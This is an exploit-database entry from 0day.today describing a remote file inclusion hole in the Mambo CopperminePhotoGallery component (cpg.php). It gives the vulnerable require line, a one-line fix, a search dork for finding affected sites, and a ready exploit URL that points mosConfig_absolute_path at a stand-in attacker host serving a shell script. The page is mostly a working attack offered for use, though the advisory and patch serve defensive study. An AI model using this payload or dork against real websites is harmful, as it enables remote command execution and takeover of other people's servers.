[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo CopperminePhotoGalery Component Remote Include Vulnerability

Author
k1tk4t
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-700
Category
web applications
Date add
15-08-2006
Platform
unsorted
==================================================================
Mambo CopperminePhotoGalery Component Remote Include Vulnerability
==================================================================



###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?





#  0day.today [2024-12-24]  #